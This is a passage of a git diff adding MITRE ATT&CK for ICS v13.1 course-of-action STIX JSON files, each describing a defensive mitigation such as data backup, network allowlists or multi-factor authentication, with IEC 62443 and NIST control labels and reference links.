"Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9a945a29-5233-4422-a9e3-3e957b0e8bce", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0928", + "external_id": "M0928" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0.json new file mode 100644 index 0000000000000000000000000000000000000000..4094dc3643c94ba77fe9fa8e6fe3d3508475f684 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--b630160b-4bc4-4b30-9042-1f08f2ab78b1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.007Z", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - EDR 3.2", + "NIST SP 800-53 Rev. 4 - MP-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9e3adcad-0b8f-4ecc-a2f3-06f607f53bf0", + "created": "2019-06-11T16:28:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0934", + "external_id": "M0934" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc.json new file mode 100644 index 0000000000000000000000000000000000000000..447ed33cb48b3bfc78cca782b0e6b74a641e9471 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--da12d452-4be1-4122-a01b-90d18f8c432a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:19.946Z", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive data-at-rest with strong encryption.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1", + "NIST SP 800-53 Rev. 4 - SC-28" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "created": "2019-06-11T16:43:44.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0941", + "external_id": "M0941" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a.json new file mode 100644 index 0000000000000000000000000000000000000000..74f03cc0eaf6b06176c18e12fa3d829233289881 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--8259b2ea-d3e3-49b9-aeeb-48c0d29363ee", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.969Z", + "name": "Network Allowlists", + "description": "Network allowlists can be implemented through either host-based files or system hosts files to specify what connections (e.g., IP address, MAC address, port, protocol) can be made from a device. Allowlist techniques that operate at the application layer (e.g., DNP3, Modbus, HTTP) are addressed in [Filter Network Traffic](https://attack.mitre.org/mitigations/M0937) mitigation.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "type": "course-of-action", + "id": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "created": "2019-06-10T20:53:36.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0807", + "external_id": "M0807" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c.json new file mode 100644 index 0000000000000000000000000000000000000000..c1de63f2053ececbb597b690e01f72646e3e26e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--b14b6620-dfc6-483a-958b-16193b4bbf75", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:16.556Z", + "name": "Supply Chain Management", + "description": "Implement a supply chain management program, including policies and procedures to ensure all devices and components originate from a trusted supplier and are tested to verify their integrity.", + "labels": [ + "NIST SP 800-53 Rev. 4 - SA-12" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ac8f3492-7fbb-4a0a-b0b4-b75ec676136c", + "created": "2021-04-12T17:00:21.233Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0817", + "external_id": "M0817" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ad12819e-3211-4291-b360-069f280cff0a.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ad12819e-3211-4291-b360-069f280cff0a.json new file mode 100644 index 0000000000000000000000000000000000000000..693a34708ad0d0e5d0390cafdf99819575e29f73 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ad12819e-3211-4291-b360-069f280cff0a.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--66caee74-ec63-4f09-b5a1-f41865a4da87", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.679Z", + "name": "Data Backup", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of 'gold-copy' back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.3", + "IEC 62443-4-2:2019 - CR 7.3", + "NIST SP 800-53 Rev. 4 - CP-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "created": "2019-07-19T14:33:33.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0953", + "external_id": "M0953" + }, + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e.json new file mode 100644 index 0000000000000000000000000000000000000000..494a3d03e24fd873fb395c5ca55b0b0e0f93efda --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--548eef48-3610-4b06-ac17-63c5683f530b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.598Z", + "name": "Out-of-Band Communications Channel", + "description": "Have alternative methods to support communication requirements during communication failures and data integrity attacks. (Citation: National Institute of Standards and Technology April 2013) (Citation: Defense Advanced Research Projects Agency)", + "labels": [ + "NIST SP 800-53 Rev. 4 - SC-37" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0810", + "external_id": "M0810" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + }, + { + "source_name": "Defense Advanced Research Projects Agency", + "description": "Defense Advanced Research Projects Agency National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 Rapid Attack Detection, Isolation and Characterization Systems (RADICS) Retrieved. 2020/09/17 ", + "url": "https://www.darpa.mil/program/rapid-attack-detection-isolation-and-characterization-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697.json new file mode 100644 index 0000000000000000000000000000000000000000..15ee6a38488037aab0b2ca478729619a938887ed --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--1aa81b4e-05c4-4393-a6e1-be42a692b130", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:20.836Z", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Perform periodic integrity checks of the device to validate the correctness of the firmware, software, programs, and configurations. Integrity checks, which typically include cryptographic hashes or digital signatures, should be compared to those obtained at known valid states, especially after events like device reboots, program downloads, or program restarts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.4", + "IEC 62443-4-2:2019 - CR 3.4", + "NIST SP 800-53 Rev. 4 - SI-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "created": "2019-06-11T17:06:14.029Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0947", + "external_id": "M0947" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac.json new file mode 100644 index 0000000000000000000000000000000000000000..418968e017905554b708de1ff6667de287c9832b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--a010090d-3f16-4f7e-814c-da8599564967", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.263Z", + "name": "Communication Authenticity", + "description": "When communicating over an untrusted network, utilize secure network protocols that both authenticate the message sender and can verify its integrity. This can be done either through message authentication codes (MACs) or digital signatures, to detect spoofed network messages and unauthorized connections.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.1", + "IEC 62443-4-2:2019 - CR 3.1", + "NIST SP 800-53 Rev. 4 - SC-8; SC-23" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0802", + "external_id": "M0802" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d0909119-2f71-4923-87db-b649881672d7.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d0909119-2f71-4923-87db-b649881672d7.json new file mode 100644 index 0000000000000000000000000000000000000000..a21cf86485efa26eeadc04bb389bfa12fbd4e5e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d0909119-2f71-4923-87db-b649881672d7.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--2a395ddb-6316-4269-8e7b-86a989bb06ea", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:20.110Z", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "created": "2019-06-11T16:45:19.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0942", + "external_id": "M0942" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d48b79b2-076d-483e-949c-0d38aa347499.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d48b79b2-076d-483e-949c-0d38aa347499.json new file mode 100644 index 0000000000000000000000000000000000000000..9c9b3d86944414acb9b04d453c641c62c8b30b50 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--d48b79b2-076d-483e-949c-0d38aa347499.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--de2cca52-6639-4689-9924-c1174355051d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "created": "2019-06-06T19:55:50.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0919", + "external_id": "M0919" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--da44255d-85c5-492c-baf3-ee823d44f848.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--da44255d-85c5-492c-baf3-ee823d44f848.json new file mode 100644 index 0000000000000000000000000000000000000000..640f9f2a01851d781bfe456bdde093b9290c8b47 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--da44255d-85c5-492c-baf3-ee823d44f848.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--83d6b557-b464-41b1-b601-015f93865f8e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Safety Instrumented Systems", + "description": "Utilize Safety Instrumented Systems (SIS) to provide an additional layer of protection to hazard scenarios that may cause property damage. A SIS will typically include sensors, logic solvers, and a final control element that can be used to automatically respond to an hazardous condition (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) . Ensure that all SISs are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0812", + "external_id": "M0812" + }, + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba.json new file mode 100644 index 0000000000000000000000000000000000000000..86d7d845e565af9bb700f8351dd2509cb87cc6e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--19b957d9-c2df-4708-8b0e-fd08381f3d1e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.076Z", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "labels": [ + "NIST SP 800-53 Rev. 4 - AT-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "created": "2019-06-06T16:50:04.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0917", + "external_id": "M0917" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd.json new file mode 100644 index 0000000000000000000000000000000000000000..bc9d36620026cc3efe5a91ea63f7c530573c1913 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--4ee2a656-2cb5-4763-8ef6-ebe69fa79e4d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:18.842Z", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. Within industrial control environments assets such as low-level controllers, workstations, and HMIs have real-time operational control and safety requirements which may restrict the use of multi-factor.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.7", + "IEC 62443-4-2:2019 - CR 1.7", + "NIST SP 800-53 Rev. 4 - IA-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "created": "2019-06-10T20:53:36.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0932", + "external_id": "M0932" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037.json new file mode 100644 index 0000000000000000000000000000000000000000..8b58407ec761cea1b244c1db8aa9136ae52d637e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--ee2a4de7-7066-4ffc-bd59-86ddce8acd2c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:16.897Z", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "labels": [ + "NIST SP 800-53 Rev. 4 - RA-5" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--de0bc375-50e1-4e26-a342-a8ff8c9d3037", + "created": "2019-06-06T16:47:30.700Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0916", + "external_id": "M0916" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd.json new file mode 100644 index 0000000000000000000000000000000000000000..0dce9d0b042eb41e92aa6e097f087d4256afefa5 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--48ba8f57-622d-4d71-80c8-8fd3f8e7707a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:13.851Z", + "name": "Authorization Enforcement", + "description": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector (Citation: International Electrotechnical Commission July 2020), while IEEE 1686 defines standard permissions for users of IEDs. (Citation: Institute of Electrical and Electronics Engineers January 2014)", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0800", + "external_id": "M0800" + }, + { + "source_name": "International Electrotechnical Commission July 2020", + "description": "International Electrotechnical Commission 2020, July 17 IEC 62351 - Power systems management and associated information exchange - Data and communications security Retrieved. 2020/09/17 ", + "url": "https://webstore.iec.ch/publication/6912" + }, + { + "source_name": "Institute of Electrical and Electronics Engineers January 2014", + "description": "Institute of Electrical and Electronics Engineers 2014, January 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities Retrieved. 2020/09/17 ", + "url": "https://standards.ieee.org/standard/1686-2013.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48.json new file mode 100644 index 0000000000000000000000000000000000000000..e05cd0ba7c693609c1b3cc53f135633c9667eca7 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--8e73ddb0-1317-4f97-8823-698dd3d2460e", + "spec_version": "2.0", + "objects": [ + { + 